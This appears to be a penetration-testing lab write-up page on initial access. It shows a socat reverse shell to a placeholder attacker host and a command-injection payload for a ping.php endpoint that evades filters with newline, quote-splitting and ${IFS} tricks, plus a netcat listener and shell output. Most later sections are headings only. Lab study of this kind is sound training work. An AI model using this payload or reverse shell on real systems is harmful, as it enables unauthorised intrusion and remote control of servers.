πŸš€Initial Access

🎯 Overview

Initial Access transforms external reconnaissance into stable internal network foothold. This phase focuses on converting command injection into reverse shells, TTY upgrades, and privilege escalation to establish persistent access for internal Active Directory attacks.

πŸš€ Reverse Shell Establishment

πŸ”§ Socat Reverse Shell (Filter Bypass)

# Base socat command (filtered):
socat TCP4:ATTACKER_IP:PORT EXEC:/bin/bash

# Filter bypass payload:
GET /ping.php?ip=127.0.0.1%0a's'o'c'a't'${IFS}TCP4:ATTACKER_IP:8443${IFS}EXEC:bash

# Explanation:
%0a         # Newline character (command separator bypass)
's'o'c'a't' # Single quotes around each character (command bypass)
${IFS}      # Environment variable for space bypass

🎧 Listener Setup

# Start netcat listener
nc -nvlp 8443

# Expected connection:
connect to [ATTACKER_IP] from (UNKNOWN) [TARGET_IP] 51496
uid=1004(webdev) gid=1004(webdev) groups=1004(webdev),4(adm)

πŸ”„ TTY Upgrade Process

πŸ› οΈ Socat Interactive Terminal

🐍 Alternative Python TTY

πŸ” Privilege Escalation Discovery

πŸ“‹ Audit Log Analysis

πŸ” Credential Extraction from Logs

πŸ”Ί User Escalation

🌐 Network Position Analysis

πŸ“Š Network Interface Discovery

🎯 Host Information

πŸ”’ Persistence Preparation

πŸ›‘οΈ Access Maintenance Strategy

πŸ“‹ Next Steps Planning

🎯 HTB Academy Lab

πŸ“‹ Lab Solution Summary

πŸ” Learning Objectives

πŸ›‘οΈ Defensive Recommendations

πŸ”’ Application Security

Last updated